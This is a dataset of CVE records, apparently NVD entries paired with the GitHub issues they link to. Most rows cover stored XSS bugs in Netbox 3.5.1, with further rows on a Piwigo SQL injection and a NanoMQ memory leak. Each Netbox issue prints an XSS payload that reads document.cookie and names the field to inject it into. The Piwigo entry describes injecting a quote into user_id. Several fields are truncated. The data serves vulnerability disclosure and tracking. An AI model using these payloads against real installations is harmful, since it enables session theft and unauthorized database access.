"matchCriteriaId": "B279DE47-F1F5-4BB9-A47B-1C9B73DD9076",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludi... | [
"352"
] | 352 | https://github.com/Piwigo/Piwigo/issues/1908 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"Piwigo",
"Piwigo"
] | This vulnerability lies in the 'add tags' function in the backend.

Try creating a new label here.

//like this

Add the 'user_id' parameter with single quotes

Discovering ... | There is a SQL Injection in the "profile" function of piwigo | https://api.github.com/repos/Piwigo/Piwigo/issues/1911/comments | 0 | 2023-05-04T12:22:34Z | 2023-05-05T08:25:03Z | https://github.com/Piwigo/Piwigo/issues/1911 | 1,695,904,246 | 1,911 |
CVE-2023-33785 | 2023-05-24T20:15:10.210 | A stored cross-site scripting (XSS) vulnerability in the Create Rack Roles (/dcim/rack-roles/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/8"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/n... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | [
"79"
] | 79 | https://github.com/anhdq201/netbox/issues/8 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"anhdq201",
"netbox"
] | # Version: 3.5.1
# Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Rack Roles" function in the "Organization" feature.
# Proof of Concept
**Step 1:** Go to `/dcim/rack-roles/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`... | Stored Cross Site Scripting Vulnerability in "Create Rack Roles" function in Netbox 3.5.1 | https://api.github.com/repos/anhdq201/netbox/issues/8/comments | 0 | 2023-05-18T16:20:48Z | 2023-05-18T16:20:48Z | https://github.com/anhdq201/netbox/issues/8 | 1,715,908,948 | 8 |
CVE-2023-33786 | 2023-05-24T20:15:10.263 | A stored cross-site scripting (XSS) vulnerability in the Create Circuit Types (/circuits/circuit-types/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/n... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | [
"79"
] | 79 | https://github.com/anhdq201/netbox/issues/2 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"anhdq201",
"netbox"
] | # Version: 3.5.1
# Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Circuit Types" function in the "Circuits" feature.
# Proof of Concept
**Step 1:** Go to `/circuits/circuit-types/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cooki... | Stored Cross Site Scripting Vulnerability in "Create Circuit Types" function in Netbox 3.5.1 | https://api.github.com/repos/anhdq201/netbox/issues/2/comments | 0 | 2023-05-18T15:09:47Z | 2023-05-18T15:25:56Z | https://github.com/anhdq201/netbox/issues/2 | 1,715,807,069 | 2 |
CVE-2023-33787 | 2023-05-24T20:15:10.317 | A stored cross-site scripting (XSS) vulnerability in the Create Tenant Groups (/tenancy/tenant-groups/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/n... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | [
"79"
] | 79 | https://github.com/anhdq201/netbox/issues/6 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"anhdq201",
"netbox"
] | # Version: 3.5.1
# Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Tenant Groups" function in the "Organization" feature.
# Proof of Concept
**Step 1:** Go to `/tenancy/tenant-groups/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.co... | Stored Cross Site Scripting Vulnerability in "Create Tenant Groups" function in Netbox 3.5.1 | https://api.github.com/repos/anhdq201/netbox/issues/6/comments | 0 | 2023-05-18T16:08:05Z | 2023-05-18T16:08:05Z | https://github.com/anhdq201/netbox/issues/6 | 1,715,892,519 | 6 |
CVE-2023-33788 | 2023-05-24T20:15:10.373 | A stored cross-site scripting (XSS) vulnerability in the Create Providers (/circuits/providers/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/n... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | [
"79"
] | 79 | https://github.com/anhdq201/netbox/issues/3 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"anhdq201",
"netbox"
] | # Version: 3.5.1
# Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Providers" function in the "Circuits" feature.
# Proof of Concept
**Step 1:** Go to `/circuits/providers/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`" ... | Stored Cross Site Scripting Vulnerability in "Create Providers" function in Netbox 3.5.1 | https://api.github.com/repos/anhdq201/netbox/issues/3/comments | 0 | 2023-05-18T15:18:30Z | 2023-05-18T15:25:34Z | https://github.com/anhdq201/netbox/issues/3 | 1,715,819,719 | 3 |
CVE-2023-33789 | 2023-05-24T20:15:10.430 | A stored cross-site scripting (XSS) vulnerability in the Create Contact Groups (/tenancy/contact-groups/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/n... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | [
"79"
] | 79 | https://github.com/anhdq201/netbox/issues/7 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"anhdq201",
"netbox"
] | # Version: 3.5.1
# Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Contact Groups" function in the "Organization" feature.
# Proof of Concept
**Step 1:** Go to `/tenancy/contact-groups/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.... | Stored Cross Site Scripting Vulnerability in "Create Contact Groups" function in Netbox 3.5.1 | https://api.github.com/repos/anhdq201/netbox/issues/7/comments | 0 | 2023-05-18T16:12:20Z | 2023-05-18T16:12:20Z | https://github.com/anhdq201/netbox/issues/7 | 1,715,897,991 | 7 |
CVE-2023-33790 | 2023-05-24T20:15:10.487 | A stored cross-site scripting (XSS) vulnerability in the Create Locations (/dcim/locations/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/9"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/n... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | [
"79"
] | 79 | https://github.com/anhdq201/netbox/issues/9 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"anhdq201",
"netbox"
] | # Version: 3.5.1
# Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Locations" function in the "Organization" feature.
# Proof of Concept
**Step 1:** Go to `/dcim/locations/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`" ... | Stored Cross Site Scripting Vulnerability in "Create Locations" function in Netbox 3.5.1 | https://api.github.com/repos/anhdq201/netbox/issues/9/comments | 0 | 2023-05-18T16:26:30Z | 2023-05-18T16:30:19Z | https://github.com/anhdq201/netbox/issues/9 | 1,715,915,970 | 9 |
CVE-2023-33791 | 2023-05-24T20:15:10.543 | A stored cross-site scripting (XSS) vulnerability in the Create Provider Accounts (/circuits/provider-accounts/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/n... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | [
"79"
] | 79 | https://github.com/anhdq201/netbox/issues/4 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"anhdq201",
"netbox"
] | # Version: 3.5.1
# Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Provider Accounts" function in the "Circuits" feature.
# Proof of Concept
**Step 1:** Go to `/circuits/provider-accounts/`, click "Add" and insert payload "`<img src=1 onerror='alert(docume... | Stored Cross Site Scripting Vulnerability in "Create Provider Accounts" function in Netbox 3.5.1 | https://api.github.com/repos/anhdq201/netbox/issues/4/comments | 0 | 2023-05-18T15:25:19Z | 2023-05-18T15:25:19Z | https://github.com/anhdq201/netbox/issues/4 | 1,715,829,577 | 4 |
CVE-2023-33792 | 2023-05-24T20:15:10.607 | A stored cross-site scripting (XSS) vulnerability in the Create Site Groups (/dcim/site-groups/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/10"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | [
"79"
] | 79 | https://github.com/anhdq201/netbox/issues/10 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"anhdq201",
"netbox"
] | # Version: 3.5.1
# Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Site Groups" function in the "Organization" feature.
# Proof of Concept
**Step 1:** Go to `/dcim/site-groups/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/... | Stored Cross Site Scripting Vulnerability in "Create Site Groups" function in Netbox 3.5.1 | https://api.github.com/repos/anhdq201/netbox/issues/10/comments | 0 | 2023-05-18T16:29:59Z | 2023-05-18T16:29:59Z | https://github.com/anhdq201/netbox/issues/10 | 1,715,921,814 | 10 |
CVE-2023-33793 | 2023-05-24T20:15:10.663 | A stored cross-site scripting (XSS) vulnerability in the Create Power Panels (/dcim/power-panels/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/n... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | [
"79"
] | 79 | https://github.com/anhdq201/netbox/issues/1 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"anhdq201",
"netbox"
] | # Version: 3.5.1
# Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Power Panels" function in the "Power" feature.
# Proof of Concept
**Step 1:** Go to `/dcim/power-panels/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`" i... | Stored Cross Site Scripting Vulnerability in "Create Power Panels" function in Netbox 3.5.1 | https://api.github.com/repos/anhdq201/netbox/issues/1/comments | 0 | 2023-05-18T15:04:10Z | 2023-05-18T15:26:12Z | https://github.com/anhdq201/netbox/issues/1 | 1,715,798,041 | 1 |
CVE-2023-33794 | 2023-05-24T20:15:10.717 | A stored cross-site scripting (XSS) vulnerability in the Create Tenants (/tenancy/tenants/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/n... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | [
"79"
] | 79 | https://github.com/anhdq201/netbox/issues/5 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"anhdq201",
"netbox"
] | # Version: 3.5.1
# Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Tenants" function in the "Organization" feature.
# Proof of Concept
**Step 1:** Go to `/tenancy/tenants/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`" i... | Stored Cross Site Scripting Vulnerability in "Create Tenants" function in Netbox 3.5.1 | https://api.github.com/repos/anhdq201/netbox/issues/5/comments | 0 | 2023-05-18T16:03:50Z | 2023-05-18T16:03:50Z | https://github.com/anhdq201/netbox/issues/5 | 1,715,886,167 | 5 |
CVE-2023-33795 | 2023-05-24T20:15:10.773 | A stored cross-site scripting (XSS) vulnerability in the Create Contact Roles (/tenancy/contact-roles/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/15"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | [
"79"
] | 79 | https://github.com/anhdq201/netbox/issues/15 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"anhdq201",
"netbox"
] | # Version: 3.5.1
# Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Contacts" function in the "Organization" feature.
# Proof of Concept
**Step 1:** Go to `/tenancy/contact-roles/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)... | Stored Cross Site Scripting Vulnerability in "Create Contact Roles" function in Netbox 3.5.1 | https://api.github.com/repos/anhdq201/netbox/issues/15/comments | 0 | 2023-05-18T16:44:45Z | 2023-05-18T16:44:45Z | https://github.com/anhdq201/netbox/issues/15 | 1,715,942,924 | 15 |
CVE-2023-33797 | 2023-05-24T20:15:10.893 | A stored cross-site scripting (XSS) vulnerability in the Create Sites (/dcim/sites/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/12"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | [
"79"
] | 79 | https://github.com/anhdq201/netbox/issues/12 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"anhdq201",
"netbox"
] | # Version: 3.5.1
# Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Sites" function in the "Organization" feature.
# Proof of Concept
**Step 1:** Go to `/dcim/sites/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`" in "Name... | Stored Cross Site Scripting Vulnerability in "Create Sites" function in Netbox 3.5.1 | https://api.github.com/repos/anhdq201/netbox/issues/12/comments | 0 | 2023-05-18T16:34:34Z | 2023-05-18T16:34:34Z | https://github.com/anhdq201/netbox/issues/12 | 1,715,930,151 | 12 |
CVE-2023-33798 | 2023-05-24T20:15:10.947 | A stored cross-site scripting (XSS) vulnerability in the Create Rack (/dcim/rack/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/13"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | [
"79"
] | 79 | https://github.com/anhdq201/netbox/issues/13 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"anhdq201",
"netbox"
] | # Version: 3.5.1
# Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Rack" function in the "Organization" feature.
# Proof of Concept
**Step 1:** Go to `/dcim/rack/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`" in "Name" ... | Stored Cross Site Scripting Vulnerability in "Create Rack" function in Netbox 3.5.1 | https://api.github.com/repos/anhdq201/netbox/issues/13/comments | 0 | 2023-05-18T16:37:16Z | 2023-05-18T16:37:16Z | https://github.com/anhdq201/netbox/issues/13 | 1,715,934,227 | 13 |
CVE-2023-33799 | 2023-05-24T20:15:11.003 | A stored cross-site scripting (XSS) vulnerability in the Create Contacts (/tenancy/contacts/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/14"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | [
"79"
] | 79 | https://github.com/anhdq201/netbox/issues/14 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"anhdq201",
"netbox"
] | # Version: 3.5.1
# Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Contacts" function in the "Organization" feature.
# Proof of Concept
**Step 1:** Go to `/tenancy/contacts/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`"... | Stored Cross Site Scripting Vulnerability in "Create Contacts" function in Netbox 3.5.1 | https://api.github.com/repos/anhdq201/netbox/issues/14/comments | 0 | 2023-05-18T16:42:36Z | 2023-05-18T16:42:36Z | https://github.com/anhdq201/netbox/issues/14 | 1,715,940,484 | 14 |
CVE-2023-33800 | 2023-05-24T20:15:11.060 | A stored cross-site scripting (XSS) vulnerability in the Create Regions (/dcim/regions/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/11"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | [
"79"
] | 79 | https://github.com/anhdq201/netbox/issues/11 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"anhdq201",
"netbox"
] | # Version: 3.5.1
# Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Regions" function in the "Organization" feature.
# Proof of Concept
**Step 1:** Go to `/dcim/regions/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`" in "... | Stored Cross Site Scripting Vulnerability in "Create Regions" function in Netbox 3.5.1 | https://api.github.com/repos/anhdq201/netbox/issues/11/comments | 0 | 2023-05-18T16:32:07Z | 2023-05-18T16:32:07Z | https://github.com/anhdq201/netbox/issues/11 | 1,715,925,619 | 11 |
CVE-2023-33656 | 2023-05-30T18:15:10.383 | A memory leak vulnerability exists in NanoMQ 0.17.2. The vulnerability is located in the file message.c. An attacker could exploit this vulnerability to cause a denial of service attack by causing the program to consume all available memory resources. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://github.com/emqx/nanomq"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List"
],
"url": "https://github.com/emqx/nanomq/issues/1164"
},
{
"source": "cve@mitre.org",
"ta... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:emqx:nanomq:0.17.2:*:*:*:*:*:*:*",
"matchCriteriaId": "0898CABA-5930-437A-8300-4D91648091F1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding... | [
"770"
] | 770 | https://github.com/emqx/nanomq/issues/1164 | [
"Exploit",
"Mailing List"
] | github.com | [
"emqx",
"nanomq"
] | **Describe the bug**
您好,我们在NanoMQ当前版本中还发现了一项内存泄露,以下为详细漏洞信息以供开发人员参考。
School of Cyber Science and Technology, Shandong University
**Expected behavior**
如果在编译时启用 ASAN,NanoMQ 会崩溃并显示 ASAN 信息。

**To Re... | potential memleak | https://api.github.com/repos/nanomq/nanomq/issues/1164/comments | 2 | 2023-04-14T14:46:47Z | 2023-04-15T07:50:40Z | https://github.com/nanomq/nanomq/issues/1164 | 1,668,392,801 | 1,164 |
CVE-2023-33656 | 2023-05-30T18:15:10.383 | A memory leak vulnerability exists in NanoMQ 0.17.2. The vulnerability is located in the file message.c. An attacker could exploit this vulnerability to cause a denial of service attack by causing the program to consume all available memory resources. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
